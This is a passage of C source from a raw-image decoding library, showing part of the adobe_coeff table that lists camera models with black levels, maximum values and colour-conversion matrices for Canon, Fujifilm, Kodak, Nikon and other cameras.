All matrices are from Adobe DNG Converter unless otherwise noted.
*/
void CLASS adobe_coeff (const char *t_make, const char *t_model
#ifdef LIBRAW_LIBRARY_BUILD
,int internal_only
#endif
)
{
static const struct {
const char *prefix;
int t_black, t_maximum, trans[12];
} table[] = {
{ "AgfaPhoto DC-833m", 0, 0, /* DJC */
{ 11438,-3762,-1115,-2409,9914,2497,-1227,2295,5300 } },
{ "Apple QuickTake", 0, 0, /* DJC */
{ 21392,-5653,-3353,2406,8010,-415,7166,1427,2078 } },
{"Broadcom RPi IMX219", 66, 0x3ff,
{ 5302,1083,-728,-5320,14112,1699,-863,2371,5136 } }, /* LibRaw */
{ "Broadcom RPi OV5647", 16, 0x3ff,
{ 12782,-4059,-379,-478,9066,1413,1340,1513,5176 } }, /* DJC */
{ "Canon EOS D2000", 0, 0,
{ 24542,-10860,-3401,-1490,11370,-297,2858,-605,3225 } },
{ "Canon EOS D6000", 0, 0,
{ 20482,-7172,-3125,-1033,10410,-285,2542,226,3136 } },
{ "Canon EOS D30", 0, 0,
{ 9805,-2689,-1312,-5803,13064,3068,-2438,3075,8775 } },
{ "Canon EOS D60", 0, 0xfa0,
{ 6188,-1341,-890,-7168,14489,2937,-2640,3228,8483 } },
{ "Canon EOS 5DS", 0, 0x3c96,
{ 6250,-711,-808,-5153,12794,2636,-1249,2198,5610 } },
{ "Canon EOS 5D Mark IV", 0, 0,
{ 6446, -366, -864, -4436, 12204, 2513, -952, 2496, 6348 }},
{ "Canon EOS 5D Mark III", 0, 0x3c80,
{ 6722,-635,-963,-4287,12460,2028,-908,2162,5668 } },
{ "Canon EOS 5D Mark II", 0, 0x3cf0,
{ 4716,603,-830,-7798,15474,2480,-1496,1937,6651 } },
{ "Canon EOS 5D", 0, 0xe6c,
{ 6347,-479,-972,-8297,15954,2480,-1968,2131,7649 } },
{ "Canon EOS 6D", 0, 0x3c82,
{ 8621,-2197,-787,-3150,11358,912,-1161,2400,4836 } },
{ "Canon EOS 7D Mark II", 0, 0x3510,
{ 7268,-1082,-969,-4186,11839,2663,-825,2029,5839 } },
{ "Canon EOS 7D", 0, 0x3510,
{ 6844,-996,-856,-3876,11761,2396,-593,1772,6198 } },
{ "Canon EOS 80D", 0, 0,
{ 7457,-671,-937,-4849,12495,2643,-1213,2354,5492 } },
{ "Canon EOS 10D", 0, 0xfa0,
{ 8197,-2000,-1118,-6714,14335,2592,-2536,3178,8266 } },
{ "Canon EOS 20Da", 0, 0,
{ 14155,-5065,-1382,-6550,14633,2039,-1623,1824,6561 } },
{ "Canon EOS 20D", 0, 0xfff,
{ 6599,-537,-891,-8071,15783,2424,-1983,2234,7462 } },
{ "Canon EOS 30D", 0, 0,
{ 6257,-303,-1000,-7880,15621,2396,-1714,1904,7046 } },
{ "Canon EOS 40D", 0, 0x3f60,
{ 6071,-747,-856,-7653,15365,2441,-2025,2553,7315 } },
{ "Canon EOS 50D", 0, 0x3d93,
{ 4920,616,-593,-6493,13964,2784,-1774,3178,7005 } },
{ "Canon EOS 60D", 0, 0x2ff7,
{ 6719,-994,-925,-4408,12426,2211,-887,2129,6051 } },
{ "Canon EOS 70D", 0, 0x3bc7,
{ 7034,-804,-1014,-4420,12564,2058,-851,1994,5758 } },
{ "Canon EOS 100D", 0, 0x350f,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 300D", 0, 0xfa0,
{ 8197,-2000,-1118,-6714,14335,2592,-2536,3178,8266 } },
{ "Canon EOS 350D", 0, 0xfff,
{ 6018,-617,-965,-8645,15881,2975,-1530,1719,7642 } },
{ "Canon EOS 400D", 0, 0xe8e,
{ 7054,-1501,-990,-8156,15544,2812,-1278,1414,7796 } },
{ "Canon EOS 450D", 0, 0x390d,
{ 5784,-262,-821,-7539,15064,2672,-1982,2681,7427 } },
{ "Canon EOS 500D", 0, 0x3479,
{ 4763,712,-646,-6821,14399,2640,-1921,3276,6561 } },
{ "Canon EOS 550D", 0, 0x3dd7,
{ 6941,-1164,-857,-3825,11597,2534,-416,1540,6039 } },
{ "Canon EOS 600D", 0, 0x3510,
{ 6461,-907,-882,-4300,12184,2378,-819,1944,5931 } },
{ "Canon EOS 650D", 0, 0x354d,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 750D", 0, 0x3c00,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS 760D", 0, 0x3c00,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS 700D", 0, 0x3c00,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 1000D", 0, 0xe43,
{ 6771,-1139,-977,-7818,15123,2928,-1244,1437,7533 } },
{ "Canon EOS 1100D", 0, 0x3510,
{ 6444,-904,-893,-4563,12308,2535,-903,2016,6728 } },
{ "Canon EOS 1200D", 0, 0x37c2,
{ 6461,-907,-882,-4300,12184,2378,-819,1944,5931 } },
{ "Canon EOS 1300D", 0, 0x37c2,
{ 6939, -1016, -866, -4428, 12473, 2177, -1175, 2178, 6162 } },
{ "Canon EOS M3", 0, 0,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS M5", 0, 0, /* Adobe */
{ 8532, -701, -1167, -4095, 11879, 2508, -797, 2424, 7010 }},
{ "Canon EOS M10", 0, 0,
{ 6400,-480,-888,-5294,13416,2047,-1296,2203,6137 } },
{ "Canon EOS M", 0, 0,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS-1Ds Mark III", 0, 0x3bb0,
{ 5859,-211,-930,-8255,16017,2353,-1732,1887,7448 } },
{ "Canon EOS-1Ds Mark II", 0, 0xe80,
{ 6517,-602,-867,-8180,15926,2378,-1618,1771,7633 } },
{ "Canon EOS-1D Mark IV", 0, 0x3bb0,
{ 6014,-220,-795,-4109,12014,2361,-561,1824,5787 } },
{ "Canon EOS-1D Mark III", 0, 0x3bb0,
{ 6291,-540,-976,-8350,16145,2311,-1714,1858,7326 } },
{ "Canon EOS-1D Mark II N", 0, 0xe80,
{ 6240,-466,-822,-8180,15825,2500,-1801,1938,8042 } },
{ "Canon EOS-1D Mark II", 0, 0xe80,
{ 6264,-582,-724,-8312,15948,2504,-1744,1919,8664 } },
{ "Canon EOS-1DS", 0, 0xe20,
{ 4374,3631,-1743,-7520,15212,2472,-2892,3632,8161 } },
{ "Canon EOS-1D C", 0, 0x3c4e,
{ 6847,-614,-1014,-4669,12737,2139,-1197,2488,6846 } },
{ "Canon EOS-1D X Mark II", 0, 0x3c4e,
{ 7596,-978,967,-4808,12571,2503,-1398,2567,5752 } },
{ "Canon EOS-1D X", 0, 0x3c4e,
{ 6847,-614,-1014,-4669,12737,2139,-1197,2488,6846 } },
{ "Canon EOS-1D", 0, 0xe20,
{ 6806,-179,-1020,-8097,16415,1687,-3267,4236,7690 } },
{ "Canon EOS C500", 853, 0, /* DJC */
{ 17851,-10604,922,-7425,16662,763,-3660,3636,22278 } },
{ "Canon PowerShot A530", 0, 0,
{ 0 } }, /* don't want the A5 matrix */
{ "Canon PowerShot A50", 0, 0,
{ -5300,9846,1776,3436,684,3939,-5540,9879,6200,-1404,11175,217 } },
{ "Canon PowerShot A5", 0, 0,
{ -4801,9475,1952,2926,1611,4094,-5259,10164,5947,-1554,10883,547 } },
{ "Canon PowerShot G10", 0, 0,
{ 11093,-3906,-1028,-5047,12492,2879,-1003,1750,5561 } },
{ "Canon PowerShot G11", 0, 0,
{ 12177,-4817,-1069,-1612,9864,2049,-98,850,4471 } },
{ "Canon PowerShot G12", 0, 0,
{ 13244,-5501,-1248,-1508,9858,1935,-270,1083,4366 } },
{ "Canon PowerShot G15", 0, 0,
{ 7474,-2301,-567,-4056,11456,2975,-222,716,4181 } },
{ "Canon PowerShot G16", 0, 0,
{ 14130,-8071,127,2199,6528,1551,3402,-1721,4960 } },
{ "Canon PowerShot G1 X Mark II", 0, 0,
{ 7378,-1255,-1043,-4088,12251,2048,-876,1946,5805 } },
{ "Canon PowerShot G1 X", 0, 0,
{ 7378,-1255,-1043,-4088,12251,2048,-876,1946,5805 } },
{ "Canon PowerShot G1", 0, 0,
{ -4778,9467,2172,4743,-1141,4344,-5146,9908,6077,-1566,11051,557 } },
{ "Canon PowerShot G2", 0, 0,
{ 9087,-2693,-1049,-6715,14382,2537,-2291,2819,7790 } },
{ "Canon PowerShot G3 X", 0, 0,
{ 9701,-3857,-921,-3149,11537,1817,-786,1817,5147 } },
{ "Canon PowerShot G3", 0, 0,
{ 9212,-2781,-1073,-6573,14189,2605,-2300,2844,7664 } },
{ "Canon PowerShot G5 X",0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G5", 0, 0,
{ 9757,-2872,-933,-5972,13861,2301,-1622,2328,7212 } },
{ "Canon PowerShot G6", 0, 0,
{ 9877,-3775,-871,-7613,14807,3072,-1448,1305,7485 } },
{ "Canon PowerShot G7 X Mark II", 0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G7 X", 0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G9 X",0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G9", 0, 0,
{ 7368,-2141,-598,-5621,13254,2625,-1418,1696,5743 } },
{ "Canon PowerShot Pro1", 0, 0,
{ 10062,-3522,-999,-7643,15117,2730,-765,817,7323 } },
{ "Canon PowerShot Pro70", 34, 0,
{ -4155,9818,1529,3939,-25,4522,-5521,9870,6610,-2238,10873,1342 } },
{ "Canon PowerShot Pro90", 0, 0,
{ -4963,9896,2235,4642,-987,4294,-5162,10011,5859,-1770,11230,577 } },
{ "Canon PowerShot S30", 0, 0,
{ 10566,-3652,-1129,-6552,14662,2006,-2197,2581,7670 } },
{ "Canon PowerShot S40", 0, 0,
{ 8510,-2487,-940,-6869,14231,2900,-2318,2829,9013 } },
{ "Canon PowerShot S45", 0, 0,
{ 8163,-2333,-955,-6682,14174,2751,-2077,2597,8041 } },
{ "Canon PowerShot S50", 0, 0,
{ 8882,-2571,-863,-6348,14234,2288,-1516,2172,6569 } },
{ "Canon PowerShot S60", 0, 0,
{ 8795,-2482,-797,-7804,15403,2573,-1422,1996,7082 } },
{ "Canon PowerShot S70", 0, 0,
{ 9976,-3810,-832,-7115,14463,2906,-901,989,7889 } },
{ "Canon PowerShot S90", 0, 0,
{ 12374,-5016,-1049,-1677,9902,2078,-83,852,4683 } },
{ "Canon PowerShot S95", 0, 0,
{ 13440,-5896,-1279,-1236,9598,1931,-180,1001,4651 } },
{ "Canon PowerShot S120", 0, 0,
{ 6961,-1685,-695,-4625,12945,1836,-1114,2152,5518 } },
{ "Canon PowerShot S110", 0, 0,
{ 8039,-2643,-654,-3783,11230,2930,-206,690,4194 } },
{ "Canon PowerShot S100", 0, 0,
{ 7968,-2565,-636,-2873,10697,2513,180,667,4211 } },
{ "Canon PowerShot SX1 IS", 0, 0,
{ 6578,-259,-502,-5974,13030,3309,-308,1058,4970 } },
{ "Canon PowerShot SX50 HS", 0, 0,
{ 12432,-4753,-1247,-2110,10691,1629,-412,1623,4926 } },
{ "Canon PowerShot SX60 HS", 0, 0,
{ 13161,-5451,-1344,-1989,10654,1531,-47,1271,4955 } },
{ "Canon PowerShot A3300", 0, 0, /* DJC */
{ 10826,-3654,-1023,-3215,11310,1906,0,999,4960 } },
{ "Canon PowerShot A470", 0, 0, /* DJC */
{ 12513,-4407,-1242,-2680,10276,2405,-878,2215,4734 } },
{ "Canon PowerShot A610", 0, 0, /* DJC */
{ 15591,-6402,-1592,-5365,13198,2168,-1300,1824,5075 } },
{ "Canon PowerShot A620", 0, 0, /* DJC */
{ 15265,-6193,-1558,-4125,12116,2010,-888,1639,5220 } },
{ "Canon PowerShot A630", 0, 0, /* DJC */
{ 14201,-5308,-1757,-6087,14472,1617,-2191,3105,5348 } },
{ "Canon PowerShot A640", 0, 0, /* DJC */
{ 13124,-5329,-1390,-3602,11658,1944,-1612,2863,4885 } },
{ "Canon PowerShot A650", 0, 0, /* DJC */
{ 9427,-3036,-959,-2581,10671,1911,-1039,1982,4430 } },
{ "Canon PowerShot A720", 0, 0, /* DJC */
{ 14573,-5482,-1546,-1266,9799,1468,-1040,1912,3810 } },
{ "Canon PowerShot S3 IS", 0, 0, /* DJC */
{ 14062,-5199,-1446,-4712,12470,2243,-1286,2028,4836 } },
{ "Canon PowerShot SX110 IS", 0, 0, /* DJC */
{ 14134,-5576,-1527,-1991,10719,1273,-1158,1929,3581 } },
{ "Canon PowerShot SX220", 0, 0, /* DJC */
{ 13898,-5076,-1447,-1405,10109,1297,-244,1860,3687 } },
{ "Canon IXUS 160", 0, 0, /* DJC */
{ 11657,-3781,-1136,-3544,11262,2283,-160,1219,4700 } },
{ "Casio EX-S20", 0, 0, /* DJC */
{ 11634,-3924,-1128,-4968,12954,2015,-1588,2648,7206 } },
{ "Casio EX-Z750", 0, 0, /* DJC */
{ 10819,-3873,-1099,-4903,13730,1175,-1755,3751,4632 } },
{ "Casio EX-Z10", 128, 0xfff, /* DJC */
{ 9790,-3338,-603,-2321,10222,2099,-344,1273,4799 } },
{ "CINE 650", 0, 0,
{ 3390,480,-500,-800,3610,340,-550,2336,1192 } },
{ "CINE 660", 0, 0,
{ 3390,480,-500,-800,3610,340,-550,2336,1192 } },
{ "CINE", 0, 0,
{ 20183,-4295,-423,-3940,15330,3985,-280,4870,9800 } },
{ "Contax N Digital", 0, 0xf1e,
{ 7777,1285,-1053,-9280,16543,2916,-3677,5679,7060 } },
{ "DXO ONE", 0, 0,
{ 6596,-2079,-562,-4782,13016,1933,-970,1581,5181 } },
{ "Epson R-D1", 0, 0,
{ 6827,-1878,-732,-8429,16012,2564,-704,592,7145 } },
{ "Fujifilm E550", 0, 0,
{ 11044,-3888,-1120,-7248,15168,2208,-1531,2277,8069 } },
{ "Fujifilm E900", 0, 0,
{ 9183,-2526,-1078,-7461,15071,2574,-2022,2440,8639 } },
{ "Fujifilm F5", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F6", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F77", 0, 0xfe9,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F7", 0, 0,
{ 10004,-3219,-1201,-7036,15047,2107,-1863,2565,7736 } },
{ "Fujifilm F8", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm S100FS", 514, 0,
{ 11521,-4355,-1065,-6524,13767,3058,-1466,1984,6045 } },
{ "Fujifilm S1", 0, 0,
{ 12297,-4882,-1202,-2106,10691,1623,-88,1312,4790 } },
{ "Fujifilm S20Pro", 0, 0,
{ 10004,-3219,-1201,-7036,15047,2107,-1863,2565,7736 } },
{ "Fujifilm S20", 512, 0x3fff,
{ 11401,-4498,-1312,-5088,12751,2613,-838,1568,5941 } },
{ "Fujifilm S2Pro", 128, 0,
{ 12492,-4690,-1402,-7033,15423,1647,-1507,2111,7697 } },
{ "Fujifilm S3Pro", 0, 0,
{ 11807,-4612,-1294,-8927,16968,1988,-2120,2741,8006 } },
{ "Fujifilm S5Pro", 0, 0,
{ 12300,-5110,-1304,-9117,17143,1998,-1947,2448,8100 } },
{ "Fujifilm S5000", 0, 0,
{ 8754,-2732,-1019,-7204,15069,2276,-1702,2334,6982 } },
{ "Fujifilm S5100", 0, 0,
{ 11940,-4431,-1255,-6766,14428,2542,-993,1165,7421 } },
{ "Fujifilm S5500", 0, 0,
{ 11940,-4431,-1255,-6766,14428,2542,-993,1165,7421 } },
{ "Fujifilm S5200", 0, 0,
{ 9636,-2804,-988,-7442,15040,2589,-1803,2311,8621 } },
{ "Fujifilm S5600", 0, 0,
{ 9636,-2804,-988,-7442,15040,2589,-1803,2311,8621 } },
{ "Fujifilm S6", 0, 0,
{ 12628,-4887,-1401,-6861,14996,1962,-2198,2782,7091 } },
{ "Fujifilm S7000", 0, 0,
{ 10190,-3506,-1312,-7153,15051,2238,-2003,2399,7505 } },
{ "Fujifilm S9000", 0, 0,
{ 10491,-3423,-1145,-7385,15027,2538,-1809,2275,8692 } },
{ "Fujifilm S9500", 0, 0,
{ 10491,-3423,-1145,-7385,15027,2538,-1809,2275,8692 } },
{ "Fujifilm S9100", 0, 0,
{ 12343,-4515,-1285,-7165,14899,2435,-1895,2496,8800 } },
{ "Fujifilm S9600", 0, 0,
{ 12343,-4515,-1285,-7165,14899,2435,-1895,2496,8800 } },
{ "Fujifilm SL1000", 0, 0,
{ 11705,-4262,-1107,-2282,10791,1709,-555,1713,4945 } },
{ "Fujifilm IS-1", 0, 0,
{ 21461,-10807,-1441,-2332,10599,1999,289,875,7703 } },
{ "Fujifilm IS Pro", 0, 0,
{ 12300,-5110,-1304,-9117,17143,1998,-1947,2448,8100 } },
{ "Fujifilm HS10 HS11", 0, 0xf68,
{ 12440,-3954,-1183,-1123,9674,1708,-83,1614,4086 } },
{ "Fujifilm HS2", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm HS3", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm HS50EXR", 0, 0,
{ 12085,-4727,-953,-3257,11489,2002,-511,2046,4592 } },
{ "Fujifilm F900EXR", 0, 0,
{ 12085,-4727,-953,-3257,11489,2002,-511,2046,4592 } },
{ "Fujifilm X100S", 0, 0,
{ 10592,-4262,-1008,-3514,11355,2465,-870,2025,6386 } },
{ "Fujifilm X100T", 0, 0,
{ 10592,-4262,-1008,-3514,11355,2465,-870,2025,6386 } },
{ "Fujifilm X100", 0, 0,
{ 12161,-4457,-1069,-5034,12874,2400,-795,1724,6904 } },
{ "Fujifilm X10", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X20", 0, 0,
{ 11768,-4971,-1133,-4904,12927,2183,-480,1723,4605 } },
{ "Fujifilm X30", 0, 0,
{ 12328,-5256,-1144,-4469,12927,1675,-87,1291,4351 } },
{ "Fujifilm X70", 0, 0,
{ 10450,-4329,-878,-3217,11105,2421,-752,1758,6519 } },
{ "Fujifilm X-Pro1", 0, 0,
{ 10413,-3996,-993,-3721,11640,2361,-733,1540,6011 } },
{ "Fujifilm X-Pro2", 0, 0,
{ 11434,-4948,-1210,-3746,12042,1903,-666,1479,5235 } },
{ "Fujifilm X-A1", 0, 0,
{ 11086,-4555,-839,-3512,11310,2517,-815,1341,5940 } },
{ "Fujifilm X-A2", 0, 0,
{ 10763,-4560,-917,-3346,11311,2322,-475,1135,5843 } },
{ "Fujifilm X-E1", 0, 0,
{ 10413,-3996,-993,-3721,11640,2361,-733,1540,6011 } },
{ "Fujifilm X-E2S", 0, 0,
{ 11562,-5118,-961,-3022,11007,2311,-525,1569,6097 } },
{ "Fujifilm X-E2", 0, 0,
{ 12066,-5927,-367,-1969,9878,1503,-721,2034,5453 } },
{ "Fujifilm XF1", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X-M1", 0, 0,
{ 13193,-6685,-425,-2229,10458,1534,-878,1763,5217 } },
{ "Fujifilm X-S1", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X-T10", 0, 0,
{ 10763,-4560,-917,-3346,11311,2322,-475,1135,5843 } },
{ "Fujifilm X-T1", 0, 0,
{ 8458,-2451,-855,-4597,12447,2407,-1475,2482,6526 } },
{ "Fujifilm X-T2", 0, 0,
{ 11434,-4948,-1210,-3746,12042,1903,-666,1479,5235 } },
{ "Fujifilm XQ1", 0, 0,
{ 9252,-2704,-1064,-5893,14265,1717,-1101,2341,4349 } },
{ "Fujifilm XQ2", 0, 0,
{ 9252,-2704,-1064,-5893,14265,1717,-1101,2341,4349 } },
{ "GITUP GIT2", 3200, 0,
{8489, -2583,-1036,-8051,15583,2643,-1307,1407,7354}},
{ "Hasselblad Lunar", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Hasselblad Stellar", -800, 0,
{ 8651,-2754,-1057,-3464,12207,1373,-568,1398,4434 } },
{ "Hasselblad CFV", 0, 0, /* Adobe */
{ 8519, -3260, -280, -5081, 13459, 1738, -1449, 2960, 7809, } },
{ "Hasselblad H-16MP", 0, 0, /* LibRaw */
{ 17765,-5322,-1734,-6168,13354,2135,-264,2524,7440 } },
{ "Hasselblad H-22MP", 0, 0, /* LibRaw */
{ 17765,-5322,-1734,-6168,13354,2135,-264,2524,7440 } },
{ "Hasselblad H-31MP",0, 0, /* LibRaw */
{ 14480,-5448,-1686,-3534,13123,2260,384,2952,7232 } },
{ "Hasselblad H-39MP",0, 0, /* Adobe */
{ 3857,452, -46, -6008, 14477, 1596, -2627, 4481, 5718 } },
{ "Hasselblad H3D-50", 0, 0, /* Adobe */
{ 3857,452, -46, -6008, 14477, 1596, -2627, 4481, 5718 } },
{ "Hasselblad H4D-40",0, 0, /* LibRaw */
{ 6325,-860,-957,-6559,15945,266,167,770,5936 } },
{ "Hasselblad H4D-50",0, 0, /* LibRaw */
{ 15283,-6272,-465,-2030,16031,478,-2379,390,7965 } },
{ "Hasselblad H4D-60",0, 0, /* Adobe */
{ 9662, -684, -279, -4903, 12293, 2950, -344, 1669, 6024 } },
{ "Hasselblad H5D-50c",0, 0, /* Adobe */
{ 4932, -835, 141, -4878, 11868, 3437, -1138, 1961, 7067 } },
{ "Hasselblad H5D-50",0, 0, /* Adobe */
{ 5656, -659, -346, -3923, 12306, 1791, -1602, 3509, 5442 } },
{ "Hasselblad X1D",0, 0, /* Adobe */
{4932, -835, 141, -4878, 11868, 3437, -1138, 1961, 7067 }},
{ "HTC One A9", 64, 1023, /* this is CM1 transposed */
{ 101, -20, -2, -11, 145, 41, -24, 1, 56 } },
{ "Imacon Ixpress", 0, 0, /* DJC */
{ 7025,-1415,-704,-5188,13765,1424,-1248,2742,6038 } },
{ "Kodak NC2000", 0, 0,
{ 13891,-6055,-803,-465,9919,642,2121,82,1291 } },
{ "Kodak DCS315C", -8, 0,
{ 17523,-4827,-2510,756,8546,-137,6113,1649,2250 } },
{ "Kodak DCS330C", -8, 0,
{ 20620,-7572,-2801,-103,10073,-396,3551,-233,2220 } },
{ "Kodak DCS420", 0, 0,
{ 10868,-1852,-644,-1537,11083,484,2343,628,2216 } },
{ "Kodak DCS460", 0, 0,
{ 10592,-2206,-967,-1944,11685,230,2206,670,1273 } },
{ "Kodak EOSDCS1", 0, 0,
{ 10592,-2206,-967,-1944,11685,230,2206,670,1273 } },
{ "Kodak EOSDCS3B", 0, 0,
{ 9898,-2700,-940,-2478,12219,206,1985,634,1031 } },
{ "Kodak DCS520C", -178, 0,
{ 24542,-10860,-3401,-1490,11370,-297,2858,-605,3225 } },
{ "Kodak DCS560C", -177, 0,
{ 20482,-7172,-3125,-1033,10410,-285,2542,226,3136 } },
{ "Kodak DCS620C", -177, 0,
{ 23617,-10175,-3149,-2054,11749,-272,2586,-489,3453 } },
{ "Kodak DCS620X", -176, 0,
{ 13095,-6231,154,12221,-21,-2137,895,4602,2258 } },
{ "Kodak DCS660C", -173, 0,
{ 18244,-6351,-2739,-791,11193,-521,3711,-129,2802 } },
{ "Kodak DCS720X", 0, 0,
{ 11775,-5884,950,9556,1846,-1286,-1019,6221,2728 } },
{ "Kodak DCS760C", 0, 0,
{ 16623,-6309,-1411,-4344,13923,323,2285,274,2926 } },
{ "Kodak DCS Pro SLR", 0, 0,
{ 5494,2393,-232,-6427,13850,2846,-1876,3997,5445 } },
{ "Kodak DCS Pro 14nx", 0, 0,
{ 5494,2393,-232,-6427,13850,2846,-1876,3997,5445 } },
{ "Kodak DCS Pro 14", 0, 0,
{ 7791,3128,-776,-8588,16458,2039,-2455,4006,6198 } },
{ "Kodak ProBack645", 0, 0,
{ 16414,-6060,-1470,-3555,13037,473,2545,122,4948 } },
{ "Kodak ProBack", 0, 0,
{ 21179,-8316,-2918,-915,11019,-165,3477,-180,4210 } },
{ "Kodak P712", 0, 0,
{ 9658,-3314,-823,-5163,12695,2768,-1342,1843,6044 } },
{ "Kodak P850", 0, 0xf7c,
{ 10511,-3836,-1102,-6946,14587,2558,-1481,1792,6246 } },
{ "Kodak P880", 0, 0xfff,
{ 12805,-4662,-1376,-7480,15267,2360,-1626,2194,7904 } },
{ "Kodak EasyShare Z980", 0, 0,
{ 11313,-3559,-1101,-3893,11891,2257,-1214,2398,4908 } },
{ "Kodak EasyShare Z981", 0, 0,
{ 12729,-4717,-1188,-1367,9187,2582,274,860,4411 } },
{ "Kodak EasyShare Z990", 0, 0xfed,
{ 11749,-4048,-1309,-1867,10572,1489,-138,1449,4522 } },
{ "Kodak EASYSHARE Z1015", 0, 0xef1,
{ 11265,-4286,-992,-4694,12343,2647,-1090,1523,5447 } },
{ "Leaf CMost", 0, 0,
{ 3952,2189,449,-6701,14585,2275,-4536,7349,6536 } },
{ "Leaf Valeo 6", 0, 0,
{ 3952,2189,449,-6701,14585,2275,-4536,7349,6536 } },
{ "Leaf Aptus 54S", 0, 0,
{ 8236,1746,-1314,-8251,15953,2428,-3673,5786,5771 } },
{ "Leaf Aptus 65", 0, 0,
{ 7914,1414,-1190,-8777,16582,2280,-2811,4605,5562 } },
{ "Leaf Aptus 75", 0, 0,
{ 7914,1414,-1190,-8777,16582,2280,-2811,4605,5562 } },
{ "Leaf Credo 40", 0, 0,
{ 8035, 435, -962, -6001, 13872, 2320, -1159, 3065, 5434 } },
{ "Leaf Credo 50", 0, 0,
{ 3984, 0, 0, 0, 10000, 0, 0, 0, 7666 } },
{ "Leaf Credo 60", 0, 0,
{ 8035, 435, -962, -6001, 13872,2320,-1159,3065,5434 } },
{ "Leaf Credo 80", 0, 0,
{ 6294, 686, -712, -5435, 13417, 2211, -1006, 2435, 5042 } },
{ "Leaf", 0, 0,
{ 8236,1746,-1314,-8251,15953,2428,-3673,5786,5771 } },
{ "Mamiya ZD", 0, 0,
{ 7645,2579,-1363,-8689,16717,2015,-3712,5941,5961 } },
{ "Micron 2010", 110, 0, /* DJC */
{ 16695,-3761,-2151,155,9682,163,3433,951,4904 } },
{ "Minolta DiMAGE 5", 0, 0xf7d,
{ 8983,-2942,-963,-6556,14476,2237,-2426,2887,8014 } },
{ "Minolta DiMAGE 7Hi", 0, 0xf7d,
{ 11368,-3894,-1242,-6521,14358,2339,-2475,3056,7285 } },
{ "Minolta DiMAGE 7", 0, 0xf7d,
{ 9144,-2777,-998,-6676,14556,2281,-2470,3019,7744 } },
{ "Minolta DiMAGE A1", 0, 0xf8b,
{ 9274,-2547,-1167,-8220,16323,1943,-2273,2720,8340 } },
{ "Minolta DiMAGE A200", 0, 0,
{ 8560,-2487,-986,-8112,15535,2771,-1209,1324,7743 } },
{ "Minolta DiMAGE A2", 0, 0xf8f,
{ 9097,-2726,-1053,-8073,15506,2762,-966,981,7763 } },
{ "Minolta DiMAGE Z2", 0, 0, /* DJC */
{ 11280,-3564,-1370,-4655,12374,2282,-1423,2168,5396 } },
{ "Minolta DYNAX 5", 0, 0xffb,
{ 10284,-3283,-1086,-7957,15762,2316,-829,882,6644 } },
{ "Minolta DYNAX 7", 0, 0xffb,
{ 10239,-3104,-1099,-8037,15727,2451,-927,925,6871 } },
{ "Motorola PIXL", 0, 0, /* DJC */
{ 8898,-989,-1033,-3292,11619,1674,-661,3178,5216 } },
{ "Nikon D100", 0, 0,
{ 5902,-933,-782,-8983,16719,2354,-1402,1455,6464 } },
{ "Nikon D1H", 0, 0,
{ 7577,-2166,-926,-7454,15592,1934,-2377,2808,8606 } },
{ "Nikon D1X", 0, 0,
{ 7702,-2245,-975,-9114,17242,1875,-2679,3055,8521 } },
{ "Nikon D1", 0, 0, /* multiplied by 2.218750, 1.0, 1.148438 */
{ 16772,-4726,-2141,-7611,15713,1972,-2846,3494,9521 } },
{ "Nikon D200", 0, 0xfbc,
{ 8367,-2248,-763,-8758,16447,2422,-1527,1550,8053 } },
{ "Nikon D2H", 0, 0,
{ 5710,-901,-615,-8594,16617,2024,-2975,4120,6830 } },
{ "Nikon D2X", 0, 0,
{ 10231,-2769,-1255,-8301,15900,2552,-797,680,7148 } },
{ "Nikon D3000", 0, 0,
{ 8736,-2458,-935,-9075,16894,2251,-1354,1242,8263 } },
{ "Nikon D3100", 0, 0,
{ 7911,-2167,-813,-5327,13150,2408,-1288,2483,7968 } },
{ "Nikon D3200", 0, 0xfb9,
{ 7013,-1408,-635,-5268,12902,2640,-1470,2801,7379 } },
{ "Nikon D3300", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D3400", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D300", 0, 0,
{ 9030,-1992,-715,-8465,16302,2255,-2689,3217,8069 } },
{ "Nikon D3X", 0, 0,
{ 7171,-1986,-648,-8085,15555,2718,-2170,2512,7457 } },
{ "Nikon D3S", 0, 0,
{ 8828,-2406,-694,-4874,12603,2541,-660,1509,7587 } },
{ "Nikon D3", 0, 0,
{ 8139,-2171,-663,-8747,16541,2295,-1925,2008,8093 } },
{ "Nikon D40X", 0, 0,
{ 8819,-2543,-911,-9025,16928,2151,-1329,1213,8449 } },
{ "Nikon D40", 0, 0,
{ 6992,-1668,-806,-8138,15748,2543,-874,850,7897 } },
{ "Nikon D4S", 0, 0,
